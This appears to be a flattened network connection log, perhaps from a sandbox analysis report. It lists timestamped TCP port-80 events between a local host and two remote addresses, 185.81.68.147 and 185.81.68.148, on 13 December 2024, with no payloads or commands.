                                                              Dec 13, 2024 07:47:13.515197039 CET4975080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:13.515197039 CET4975080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:13.546696901 CET8049751185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:13.546720028 CET8049743185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:13.546811104 CET4975180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:13.546816111 CET4974380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:13.547029018 CET8049745185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:13.547077894 CET4975180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:13.547091961 CET4974580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:13.635086060 CET8049750185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:13.666862965 CET8049751185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:14.440793037 CET8049748185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:14.440876007 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:14.450115919 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.549736977 CET8049749185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:14.549829960 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:14.552400112 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.570020914 CET8049752185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:14.570106983 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.570233107 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.672346115 CET8049753185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:14.672444105 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.672689915 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.690042973 CET8049752185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:14.792412996 CET8049753185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:14.878485918 CET8049750185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:14.878634930 CET4975080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:14.895461082 CET8049751185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:14.895549059 CET4975180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:15.501024008 CET8049741185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:15.501101017 CET4974180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:15.531547070 CET8049742185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:15.531622887 CET4974280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:15.970062017 CET8049752185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:15.970252991 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.063846111 CET8049753185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:16.063977003 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.584547997 CET4975080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.584755898 CET4975480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.599529028 CET4975180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:16.599792004 CET4975580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:16.704586029 CET8049754185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:16.704715014 CET4975480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.704917908 CET8049750185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:16.704993010 CET4975480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.705101013 CET4975080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.719538927 CET8049755185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:16.719651937 CET4975580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:16.719799042 CET4975580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:16.719871044 CET8049751185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:16.719938040 CET4975180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:16.824695110 CET8049754185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:16.839610100 CET8049755185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:16.954813957 CET8049746185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:16.957916975 CET4974680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:16.985627890 CET8049747185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:16.985893011 CET4974780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:18.049957991 CET8049754185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:18.050044060 CET4975480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:18.064918995 CET8049755185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:18.065016031 CET4975580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.438261986 CET8049748185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:19.438338995 CET4974880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.563644886 CET8049749185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:19.564380884 CET4974980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.800697088 CET4975480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:19.800702095 CET4975580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.801139116 CET4975780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:19.801142931 CET4975880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.921082020 CET8049754185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:19.921135902 CET8049757185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:19.921152115 CET8049758185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:19.921188116 CET4975480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:19.921272993 CET4975880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.921277046 CET4975780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:19.921374083 CET8049755185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:19.921533108 CET4975880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:19.921536922 CET4975780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:19.921616077 CET4975580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:20.041395903 CET8049758185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:20.041423082 CET8049757185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:20.968688011 CET8049752185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:20.968858004 CET4975280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:21.062755108 CET8049753185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:21.064207077 CET4975380192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:21.282970905 CET8049758185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:21.283061981 CET4975880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:21.332618952 CET8049757185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:21.332803011 CET4975780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:22.910316944 CET4975880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:22.910763979 CET4975980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:22.958363056 CET4975780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:22.958803892 CET4976080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:23.030668020 CET8049758185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:23.030761957 CET4975880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:23.030992985 CET8049759185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:23.031141996 CET4975980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:23.031424999 CET4975980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:23.078844070 CET8049760185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:23.079488993 CET8049757185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:23.079648018 CET4975780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:23.079931021 CET4976080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:23.079931021 CET4976080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:23.151566982 CET8049759185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:23.199778080 CET8049760185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:24.376986027 CET8049759185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:24.377909899 CET4975980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:24.424125910 CET8049760185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:24.425966978 CET4976080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:25.895836115 CET4975980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:25.895988941 CET4976180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:25.941962957 CET4976080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:25.943552017 CET4976280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:26.015780926 CET8049761185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:26.016123056 CET8049759185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:26.016207933 CET4975980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:26.016318083 CET4976180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:26.016742945 CET4976180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:26.062313080 CET8049760185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:26.063350916 CET8049762185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:26.063496113 CET4976080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:26.063496113 CET4976280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:26.064805031 CET4976280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:26.136461020 CET8049761185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:26.184495926 CET8049762185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:27.397629023 CET8049761185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:27.398057938 CET4976180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:27.440025091 CET8049762185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:27.441914082 CET4976280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:29.023332119 CET4976180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:29.023413897 CET4976380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:29.067596912 CET4976280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:29.067780018 CET4976480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:29.143421888 CET8049763185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:29.143534899 CET4976380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:29.143881083 CET8049761185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:29.143975019 CET4976180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:29.144040108 CET4976380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:29.187622070 CET8049764185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:29.187750101 CET4976480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:29.187833071 CET8049762185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:29.187905073 CET4976280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:29.191658974 CET4976480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:29.263847113 CET8049763185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:29.311542034 CET8049764185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:30.477885962 CET8049763185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:30.477967024 CET4976380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:30.534275055 CET8049764185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:30.534559011 CET4976480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:32.003890038 CET4976380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:32.004298925 CET4976580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:32.066260099 CET4976480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:32.066627979 CET4976680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:32.124041080 CET8049765185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:32.124177933 CET4976580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:32.124228954 CET8049763185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:32.124317884 CET4976380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:32.124402046 CET4976580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:32.186427116 CET8049766185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:32.186527014 CET8049764185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:32.186578989 CET4976680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:32.186636925 CET4976480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:32.186872005 CET4976680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:32.244148970 CET8049765185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:32.306565046 CET8049766185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:33.475101948 CET8049765185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:33.475289106 CET4976580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:33.551990986 CET8049766185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:33.552444935 CET4976680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:35.097536087 CET4976580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:35.097846985 CET4976780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:35.184417009 CET4976680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:35.185750008 CET4976880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:35.217621088 CET8049767185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:35.217744112 CET4976780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:35.217905045 CET8049765185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:35.217941046 CET4976780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:35.217966080 CET4976580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:35.304821968 CET8049766185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:35.304908991 CET4976680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:35.305588961 CET8049768185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:35.305685043 CET4976880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:35.305869102 CET4976880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:35.338030100 CET8049767185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:35.425626040 CET8049768185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:36.565433025 CET8049767185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:36.565962076 CET4976780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:36.645472050 CET8049768185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:36.646255970 CET4976880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:38.091336012 CET4976980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:38.093064070 CET4976780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:38.173053980 CET4976880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:38.173053980 CET4977080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:38.211210012 CET8049769185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:38.211292028 CET4976980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:38.211528063 CET4976980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:38.213211060 CET8049767185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:38.217823982 CET4976780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:38.292984009 CET8049770185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:38.293103933 CET4977080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:38.293203115 CET8049768185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:38.293263912 CET4976880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:38.293263912 CET4977080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:38.331305981 CET8049769185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:38.413116932 CET8049770185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:39.581466913 CET8049769185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:39.581656933 CET4976980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:39.660887003 CET8049770185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:39.660962105 CET4977080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:41.298943043 CET4976980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:41.299237967 CET4977180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:41.370497942 CET4977080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:41.370855093 CET4977280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:41.418960094 CET8049771185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:41.419040918 CET8049769185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:41.419056892 CET4977180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:41.419118881 CET4976980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:41.419322014 CET4977180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:41.490617037 CET8049772185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:41.490766048 CET8049770185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:41.490796089 CET4977280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:41.490817070 CET4977080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:41.490995884 CET4977280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:41.538969040 CET8049771185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:41.610726118 CET8049772185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:42.767491102 CET8049771185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:42.767577887 CET4977180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:42.831105947 CET8049772185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:42.831227064 CET4977280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:44.269613028 CET4977180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:44.269902945 CET4977380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:44.347696066 CET4977280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:44.347999096 CET4977480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:44.391408920 CET8049773185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:44.391479969 CET8049771185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:44.391505003 CET4977380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:44.391545057 CET4977180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:44.391789913 CET4977380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:44.467904091 CET8049774185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:44.468018055 CET4977480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:44.468204975 CET4977480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:44.468215942 CET8049772185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:44.468333006 CET4977280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:44.511568069 CET8049773185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:44.589983940 CET8049774185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:45.665481091 CET4974180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.665669918 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.666120052 CET4974280192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.666254044 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.753319025 CET8049773185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.753921032 CET4977380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.785423040 CET8049741185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.785445929 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.785561085 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.785794020 CET8049742185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.785799980 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.785877943 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.785916090 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:45.785990000 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786025047 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786058903 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786094904 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786119938 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786161900 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786185026 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786226988 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786262035 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786288977 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786320925 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786351919 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786384106 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786416054 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786467075 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786494017 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786524057 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786566019 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786596060 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786631107 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786659002 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786690950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786731958 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786758900 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786792994 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786820889 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786855936 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786895990 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786921978 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786953926 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.786987066 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787033081 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787062883 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787089109 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787123919 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787153959 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787187099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787220001 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787261963 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787291050 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787339926 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787360907 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787379026 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787421942 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787451982 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787484884 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787512064 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787543058 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787574053 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787617922 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787645102 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787673950 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787710905 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787745953 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787780046 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787820101 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787849903 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787890911 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787919044 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787959099 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.787993908 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788022995 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788060904 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788091898 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788129091 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788163900 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788192034 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788233042 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788260937 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788304090 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788332939 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788366079 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788393021 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788430929 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788459063 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788491964 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788522959 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788558006 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788589954 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788621902 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788654089 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:45.788696051 CET4977580192.168.2.4185.81.68.147
